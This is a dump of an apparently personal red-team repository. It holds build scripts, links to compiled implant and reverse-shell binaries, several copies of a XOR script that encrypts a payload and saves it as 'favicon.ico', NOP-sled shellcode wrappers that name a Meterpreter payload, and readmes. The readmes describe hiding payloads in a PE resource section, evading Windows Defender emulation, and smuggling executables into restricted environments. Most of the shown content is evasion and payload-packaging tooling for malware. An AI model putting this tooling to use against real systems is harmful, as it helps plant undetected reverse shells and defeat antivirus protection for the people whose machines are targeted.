https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/recursion_off_the_disk/ROTD/ROTD.pdb -------------------------------------------------------------------------------- /Cpp/recursion_off_the_disk/ROTD/ROTD_orig.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/recursion_off_the_disk/ROTD/ROTD_orig.exe -------------------------------------------------------------------------------- /Cpp/recursion_off_the_disk/ROTD/compile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | rc resources.rc 4 | cvtres /MACHINE:x64 /OUT:resources.o resources.res 5 | cl.exe /nologo /Od /favor:AMD64 /MT /W0 /GS- /DNDEBUG /D_CRT_SECURE_NO_WARNINGS /Tcrotd.cpp /link /OUT:ROTD.exe /SUBSYSTEM:CONSOLE /MACHINE:x64 resources.o -------------------------------------------------------------------------------- /Cpp/recursion_off_the_disk/ROTD/favicon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/recursion_off_the_disk/ROTD/favicon.ico -------------------------------------------------------------------------------- /Cpp/recursion_off_the_disk/ROTD/resources.h: -------------------------------------------------------------------------------- 1 | #define FAVICON_ICO 100 2 | -------------------------------------------------------------------------------- /Cpp/recursion_off_the_disk/ROTD/resources.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/recursion_off_the_disk/ROTD/resources.o -------------------------------------------------------------------------------- /Cpp/recursion_off_the_disk/ROTD/resources.rc: -------------------------------------------------------------------------------- 1 | #include "resources.h" 2 | 3 | FAVICON_ICO RCDATA favicon.ico 4 | -------------------------------------------------------------------------------- /Cpp/recursion_off_the_disk/ROTD/resources.res: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/recursion_off_the_disk/ROTD/resources.res -------------------------------------------------------------------------------- /Cpp/recursion_off_the_disk/ROTD/reverse_shell.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/recursion_off_the_disk/ROTD/reverse_shell.bin -------------------------------------------------------------------------------- /Cpp/recursion_off_the_disk/ROTD/rotd.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/recursion_off_the_disk/ROTD/rotd.obj -------------------------------------------------------------------------------- /Cpp/recursion_off_the_disk/ROTD/xorencrypt.py: -------------------------------------------------------------------------------- 1 | # Red Team Operator course code template 2 | # payload encryption with XOR 3 | # 4 | # author: reenz0h (twitter: @sektor7net) 5 | 6 | import sys 7 | 8 | KEY = "abcdefghijklmnopqrstuvwxyz" 9 | 10 | def xor(data, key): 11 | 12 | key = str(key) 13 | l = len(key) 14 | output_str = "" 15 | 16 | for i in range(len(data)): 17 | current = data[i] 18 | current_key = key[i % len(key)] 19 | output_str += chr(ord(current) ^ ord(current_key)) 20 | 21 | return output_str 22 | 23 | def printCiphertext(ciphertext): 24 | print('{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };') 25 | 26 | 27 | 28 | try: 29 | plaintext = open(sys.argv[1], "rb").read() 30 | except: 31 | print("File argument needed! %s " % sys.argv[0]) 32 | sys.exit() 33 | 34 | 35 | ciphertext = xor(plaintext, KEY) 36 | open("favicon.ico",'wb').write(ciphertext) 37 | print('{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };') 38 | -------------------------------------------------------------------------------- /Cpp/recursion_off_the_disk/reverse_shell/compile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /Od /MT /W0 /GS- /MP /DNDEBUG /Tcreverse_shell.cpp /link /OUT:reverse_shell.exe /SUBSYSTEM:CONSOLE /MACHINE:x64 -------------------------------------------------------------------------------- /Cpp/recursion_off_the_disk/reverse_shell/reverse_shell.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/recursion_off_the_disk/reverse_shell/reverse_shell.exe -------------------------------------------------------------------------------- /Cpp/recursion_off_the_disk/reverse_shell/reverse_shell.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/recursion_off_the_disk/reverse_shell/reverse_shell.obj -------------------------------------------------------------------------------- /Cpp/rsrc_injection/Readme.md: -------------------------------------------------------------------------------- 1 | My custom implementation of Sektor7's RED TEAM Operator: Malware Development Essentials Course 2 | 3 | This code hides the payload in the resource section of my PE file, and uses some simple obfuscation and emulation detection to 4 | bypass the most up to date Windows Defender definitions. 5 | 6 | More on bypassing Windows Defender Emulations here: 7 | 8 | https://github.com/0xAlexei/Publications/blob/master/Reverse%20Engineering%20Windows%20Defender/Windows%20Binary%20Emulator/BHUSA%20-%20DEFCON%20-%20Alexei-Bulazel-Reverse-Engineering-Windows-Defender-Revision-3.pdf 9 | -------------------------------------------------------------------------------- /Cpp/rsrc_injection/compile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | rc resources.rc 4 | cvtres /MACHINE:x64 /OUT:resources.o resources.res 5 | cl.exe /nologo /Od /MT /W0 /GS- /DNDEBUG /Tcimplant.cpp /link /OUT:implant.exe /SUBSYSTEM:WINDOWS /MACHINE:x64 resources.o -------------------------------------------------------------------------------- /Cpp/rsrc_injection/favicon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/rsrc_injection/favicon.ico -------------------------------------------------------------------------------- /Cpp/rsrc_injection/implant.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/rsrc_injection/implant.exe -------------------------------------------------------------------------------- /Cpp/rsrc_injection/implant.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/rsrc_injection/implant.obj -------------------------------------------------------------------------------- /Cpp/rsrc_injection/msgbox64.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/rsrc_injection/msgbox64.bin -------------------------------------------------------------------------------- /Cpp/rsrc_injection/resources.h: -------------------------------------------------------------------------------- 1 | #define FAVICON_ICO 100 2 | -------------------------------------------------------------------------------- /Cpp/rsrc_injection/resources.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/rsrc_injection/resources.o -------------------------------------------------------------------------------- /Cpp/rsrc_injection/resources.rc: -------------------------------------------------------------------------------- 1 | #include "resources.h" 2 | 3 | FAVICON_ICO RCDATA favicon.ico 4 | -------------------------------------------------------------------------------- /Cpp/rsrc_injection/resources.res: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/rsrc_injection/resources.res -------------------------------------------------------------------------------- /Cpp/rsrc_injection/xorencrypt.py: -------------------------------------------------------------------------------- 1 | # Red Team Operator course code template 2 | # payload encryption with XOR 3 | # 4 | # author: reenz0h (twitter: @sektor7net) 5 | 6 | import sys 7 | 8 | KEY = "mysecretkeee" 9 | 10 | def xor(data, key): 11 | 12 | key = str(key) 13 | l = len(key) 14 | output_str = "" 15 | 16 | for i in range(len(data)): 17 | current = data[i] 18 | current_key = key[i % len(key)] 19 | output_str += chr(ord(current) ^ ord(current_key)) 20 | 21 | return output_str 22 | 23 | def printCiphertext(ciphertext): 24 | print('{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };') 25 | 26 | 27 | 28 | try: 29 | plaintext = open(sys.argv[1], "rb").read() 30 | except: 31 | print("File argument needed! %s " % sys.argv[0]) 32 | sys.exit() 33 | 34 | 35 | ciphertext = xor(plaintext, KEY) 36 | open("favicon.ico",'wb').write(ciphertext) 37 | print('{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };') 38 | -------------------------------------------------------------------------------- /Cpp/rsrc_injection_shell/compile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | rc resources.rc 4 | cvtres /MACHINE:x64 /OUT:resources.o resources.res 5 | cl.exe /nologo /Od /MT /W0 /GS- /DNDEBUG /Tcimplant.cpp /link /OUT:implant.exe /SUBSYSTEM:WINDOWS /MACHINE:x64 resources.o -------------------------------------------------------------------------------- /Cpp/rsrc_injection_shell/favicon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/rsrc_injection_shell/favicon.ico -------------------------------------------------------------------------------- /Cpp/rsrc_injection_shell/implant.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/rsrc_injection_shell/implant.exe -------------------------------------------------------------------------------- /Cpp/rsrc_injection_shell/implant.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/rsrc_injection_shell/implant.obj -------------------------------------------------------------------------------- /Cpp/rsrc_injection_shell/implant_noemul.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/rsrc_injection_shell/implant_noemul.exe -------------------------------------------------------------------------------- /Cpp/rsrc_injection_shell/resources.h: -------------------------------------------------------------------------------- 1 | #define FAVICON_ICO 100 2 | -------------------------------------------------------------------------------- /Cpp/rsrc_injection_shell/resources.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/rsrc_injection_shell/resources.o -------------------------------------------------------------------------------- /Cpp/rsrc_injection_shell/resources.rc: -------------------------------------------------------------------------------- 1 | #include "resources.h" 2 | 3 | FAVICON_ICO RCDATA favicon.ico 4 | -------------------------------------------------------------------------------- /Cpp/rsrc_injection_shell/resources.res: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/rsrc_injection_shell/resources.res -------------------------------------------------------------------------------- /Cpp/rsrc_injection_shell/reverse_shell/compile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /Od /MT /W0 /GS- /MP /DNDEBUG /Tcreverse_shell.cpp /link /OUT:reverse_shell.exe /SUBSYSTEM:CONSOLE /MACHINE:x64 -------------------------------------------------------------------------------- /Cpp/rsrc_injection_shell/reverse_shell/reverse_shell.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/rsrc_injection_shell/reverse_shell/reverse_shell.exe -------------------------------------------------------------------------------- /Cpp/rsrc_injection_shell/reverse_shell/reverse_shell.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/rsrc_injection_shell/reverse_shell/reverse_shell.obj -------------------------------------------------------------------------------- /Cpp/rsrc_injection_shell/reverse_shell/shell.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/rsrc_injection_shell/reverse_shell/shell.bin -------------------------------------------------------------------------------- /Cpp/rsrc_injection_shell/shell.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/rsrc_injection_shell/shell.bin -------------------------------------------------------------------------------- /Cpp/rsrc_injection_shell/xorencrypt.py: -------------------------------------------------------------------------------- 1 | # Red Team Operator course code template 2 | # payload encryption with XOR 3 | # 4 | # author: reenz0h (twitter: @sektor7net) 5 | 6 | import sys 7 | 8 | KEY = "mysecretkeee" 9 | 10 | def xor(data, key): 11 | 12 | key = str(key) 13 | l = len(key) 14 | output_str = "" 15 | 16 | for i in range(len(data)): 17 | current = data[i] 18 | current_key = key[i % len(key)] 19 | output_str += chr(ord(current) ^ ord(current_key)) 20 | 21 | return output_str 22 | 23 | def printCiphertext(ciphertext): 24 | print('{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };') 25 | 26 | 27 | 28 | try: 29 | plaintext = open(sys.argv[1], "rb").read() 30 | except: 31 | print("File argument needed! %s " % sys.argv[0]) 32 | sys.exit() 33 | 34 | 35 | ciphertext = xor(plaintext, KEY) 36 | open("favicon.ico",'wb').write(ciphertext) 37 | print('{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };') 38 | -------------------------------------------------------------------------------- /Powershell/Readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Presentations/.placeholder: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Presentations/Building Skynet_as_submitted.pptx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Presentations/Building Skynet_as_submitted.pptx -------------------------------------------------------------------------------- /Python/PushingP/pushingpayloads.py: -------------------------------------------------------------------------------- 1 | import sys 2 | # by 0xTriboulet 3 | # Short python script that takes a raw binary payload 4 | # and build a (big) nop sled over that payload 5 | # put this large payload into your program and compile with: 6 | # /STACK:3000000 7 | try: 8 | plaintext = open(sys.argv[1], "rb").read() 9 | except: 10 | print("File argument needed! %s " % sys.argv[0]) 11 | print("python2 pushingpayloads.py meterpreter_stageless.bin > out.txt") 12 | sys.exit() 13 | 14 | print('unsigned char payload[] = { '+'0x90, '*2048000 + '0x' + ', 0x'.join(hex(ord(x))[2:] for x in plaintext) + ' };') -------------------------------------------------------------------------------- /Python/PushingP/pushingpayloadsv3.py: -------------------------------------------------------------------------------- 1 | import sys 2 | # by 0xTriboulet 3 | # Short python script that takes a raw binary payload 4 | # and build a (big) nop sled over that payload 5 | # put this large payload into your program and compile with: 6 | # /STACK:3000000 7 | # PYTHON3 8 | try: 9 | plaintext = open(sys.argv[1], "rb").read() 10 | except: 11 | print("File argument needed! %s " % sys.argv[0]) 12 | print("python3 pushingpayloadsv3.py meterpreter_stageless.bin > out.txt") 13 | sys.exit() 14 | 15 | print('unsigned char payload[] = { '+'0x90, '*2048000 + '0x' + ', '.join(str(hex(x)) for x in plaintext) + ' };') -------------------------------------------------------------------------------- /Python/Readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Python/smuggler/OUT/test.txt: -------------------------------------------------------------------------------- 1 | TEST 2 | -------------------------------------------------------------------------------- /Python/smuggler/Readme.md: -------------------------------------------------------------------------------- 1 | Short python script that converts any file into a base64 encoded zip file stored in out.txt. You can then copy the script and the contents of out.txt into a a .py and an in.txt file (respectively) on the target environment and run the script again. This methodology allows you to transfer executables into environments that otherwise do not allow file transfers. 2 | 3 | 4 | [12/4/2022] Added -x option allowing the ability to xor your smuggled files 5 | 6 | ![image](https://user-images.githubusercontent.com/22229087/205515548-cd16a267-72e2-4079-828e-cc05bcb93a9b.png) 7 | 8 | 9 | XORing remains optional though 10 | 11 | ![image](https://user-images.githubusercontent.com/22229087/205515977-d51013ef-0972-4ad1-8b15-faec22db0dde.png) 12 | -------------------------------------------------------------------------------- /Python/smuggler/in.txt: -------------------------------------------------------------------------------- 1 | UEsDBBQAAAAAAN16gVW+14P3BQAAAAUAAAAIAAAAdGVzdC50eHRURVNUClBLAQIUAxQAAAAAAN16gVW+14P3BQAAAAUAAAAIAAAAAAAAAAAAAAC0gQAAAAB0ZXN0LnR4dFBLBQYAAAAAAQABADYAAAArAAAAAAA= -------------------------------------------------------------------------------- /Python/smuggler/out.txt: -------------------------------------------------------------------------------- 1 | UEsDBBQAAAAAAN16gVW+14P3BQAAAAUAAAAIAAAAdGVzdC50eHRURVNUClBLAQIUAxQAAAAAAN16gVW+14P3BQAAAAUAAAAIAAAAAAAAAAAAAAC0gQAAAAB0ZXN0LnR4dFBLBQYAAAAAAQABADYAAAArAAAAAAA= -------------------------------------------------------------------------------- /Python/smuggler/test.txt: -------------------------------------------------------------------------------- 1 | TEST 2 | -------------------------------------------------------------------------------- /Python/utilities/Readme.md: -------------------------------------------------------------------------------- 1 | A collection of useful python scripts. Some of these have been modified from their original versions, but credit is given as much as possible to the original authors. 2 | 3 | -------------------------------------------------------------------------------- /Python/utilities/beautify.py: -------------------------------------------------------------------------------- 1 | import sys 2 | 3 | try: 4 | plaintext = open(sys.argv[1], "rb").read() 5 | except: 6 | print("File argument needed! %s " % sys.argv[0]) 7 | sys.exit() 8 | 9 | 10 | open("payload.out",'wb').write(plaintext) 11 | print('unsigned char payload[] = { 0x' + ', 0x'.join(hex(ord(x))[2:] for x in plaintext) + ' };') -------------------------------------------------------------------------------- /Python/utilities/xorencrypt.py: -------------------------------------------------------------------------------- 1 | # Red Team Operator course code template 2 | # payload encryption with XOR 3 | # 4 | # author: reenz0h (twitter: @sektor7net) 5 | 6 | import sys 7 | 8 | KEY = "WindowsSystem32" 9 | 10 | def xor(data, key): 11 | 12 | key = str(key) 13 | l = len(key) 14 | output_str = "" 15 | 16 | for i in range(len(data)): 17 | current = data[i] 18 | current_key = key[i % len(key)] 19 | output_str += chr(ord(current) ^ ord(current_key)) 20 | 21 | return output_str 22 | 23 | def printCiphertext(ciphertext): 24 | print('{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };') 25 | 26 | 27 | 28 | try: 29 | plaintext = open(sys.argv[1], "rb").read() 30 | except: 31 | print("File argument needed! %s " % sys.argv[0]) 32 | sys.exit() 33 | 34 | 35 | ciphertext = xor(plaintext, KEY) 36 | #open("payload.out",'wb').write(ciphertext) 37 | print('unsigned char payload[] = { 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };') 38 | -------------------------------------------------------------------------------- /Readme.md: -------------------------------------------------------------------------------- 1 | A disorganized repository of code snippets that I have found useful in getting the hang of new languages in the context of Red Team operations. 2 | 3 | Some of this code will be referenced in other products and is retained here for ease of access. 4 | -------------------------------------------------------------------------------- /Rust/CreateProcessA/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "peruns_fart" 3 | version = "0.1.0" 4 | edition = "2021" 5 | 6 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 7 | 8 | [dependencies] 9 | sys = "0.0.0" 10 | winapi = {version = "0.3.9", features=[ 11 | "winnt", 12 | "memoryapi", 13 | "errhandlingapi", 14 | "processthreadsapi", 15 | "synchapi", 16 | "winbase", 17 | "handleapi", 18 | "libloaderapi", 19 | "minwinbase", 20 | "heapapi" 21 | ]} 22 | windows = { version = "*", features = [ 23 | "Win32_System_Threading", 24 | "Win32_Foundation", 25 | "Win32_System_Memory", 26 | "Win32_Security" 27 | ] } 28 | windows-sys = { version = "*", features = [ 29 | "Win32_System_Threading", 30 | "Win32_Foundation", 31 | "Win32_System_Memory" 32 | ] } 33 | 34 | 35 | -------------------------------------------------------------------------------- /Rust/CreateProcessA/Readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Rust/Readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Rust/peruns_fart/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "peruns_fart" 3 | version = "0.1.0" 4 | edition = "2021" 5 | 6 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 7 | 8 | [dependencies] 9 | libc = "0.2.139" 10 | sys = "0.0.0" 11 | 12 | 13 | windows-sys = { version = "*", features = [ 14 | "Win32_Security", 15 | "Win32_Foundation", 16 | "Win32_System_Kernel", 17 | "Win32_System_Memory", 18 | "Win32_System_Threading", 19 | "Win32_System_LibraryLoader", 20 | "Win32_System_SystemServices", 21 | "Win32_System_SystemInformation", 22 | "Win32_System_Diagnostics_Debug", 23 | "Win32_System_WindowsProgramming", 24 | 25 | 26 | ] } 27 | 28 | 29 | -------------------------------------------------------------------------------- /Rust/peruns_fart/Readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Rust/rust_implantv1/implant_rust.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Rust/rust_implantv1/implant_rust.exe -------------------------------------------------------------------------------- /Rust/rust_implantv2/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "rusty_implant" 3 | version = "0.1.0" 4 | edition = "2021" 5 | 6 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 7 | 8 | [dependencies] 9 | libc = "0.2.139" 10 | region = "3.0.0" 11 | -------------------------------------------------------------------------------- /Rust/rust_implantv2/Readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Rust/rust_implantv2/rusty_implant.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Rust/rust_implantv2/rusty_implant.exe -------------------------------------------------------------------------------- /Rust/rust_implantv3/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "rusty_implantv2" 3 | version = "0.1.0" 4 | edition = "2021" 5 | 6 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 7 | 8 | [dependencies] 9 | libc = "0.2.139" 10 | sys = "0.0.0" 11 | 12 | 13 | windows-sys = { version = "*", features = [ 14 | "Win32_Security", 15 | "Win32_Foundation", 16 | "Win32_System_Kernel", 17 | "Win32_System_Memory", 18 | "Win32_System_Threading", 19 | "Win32_System_LibraryLoader", 20 | "Win32_System_SystemServices", 21 | "Win32_System_SystemInformation", 22 | "Win32_System_Diagnostics_Debug", 23 | "Win32_System_WindowsProgramming", 24 | 25 | 26 | ] } 27 | -------------------------------------------------------------------------------- /Rust/rust_implantv3/Readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Rust/rust_implantv3/rusty_implantv3.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Rust/rust_implantv3/rusty_implantv3.exe -------------------------------------------------------------------------------- /Rust/rust_implantv4/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "rusty_implantv2" 3 | version = "0.1.0" 4 | edition = "2021" 5 | 6 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 7 | 8 | [dependencies] 9 | libc = "0.2.139" 10 | sys = "0.0.0" 11 | 12 | 13 | windows-sys = { version = "*", features = [ 14 | "Win32_Security", 15 | "Win32_Foundation", 16 | "Win32_System_Kernel", 17 | "Win32_System_Memory", 18 | "Win32_System_Threading", 19 | "Win32_System_LibraryLoader", 20 | "Win32_System_SystemServices", 21 | "Win32_System_SystemInformation", 22 | "Win32_System_Diagnostics_Debug", 23 | "Win32_System_WindowsProgramming", 24 | 25 | 26 | ] } 27 | -------------------------------------------------------------------------------- /Rust/rust_implantv4/Readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Rust/rust_implantv4/rusty_implantv4.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Rust/rust_implantv4/rusty_implantv4.exe -------------------------------------------------------------------------------- /Rust/rusty_calc/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "rusty_calc" 3 | version = "0.1.0" 4 | edition = "2021" 5 | 6 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 7 | 8 | [profile.release] 9 | opt-level = 0 10 | 11 | 12 | 13 | [dependencies] 14 | errno = "0.2.8" 15 | libc = "0.2.139" 16 | windows-sys = {version = "0.42.0", features=["Win32_System_Memory", "Win32_Foundation", "Win32_System_Threading", 17 | "Win32_Security", "Win32_System_Diagnostics_Debug","Win32_System_LibraryLoader"]} 18 | -------------------------------------------------------------------------------- /Rust/rusty_calc/Readme.md: -------------------------------------------------------------------------------- 1 | 2 | --------------------------------------------------------------------------------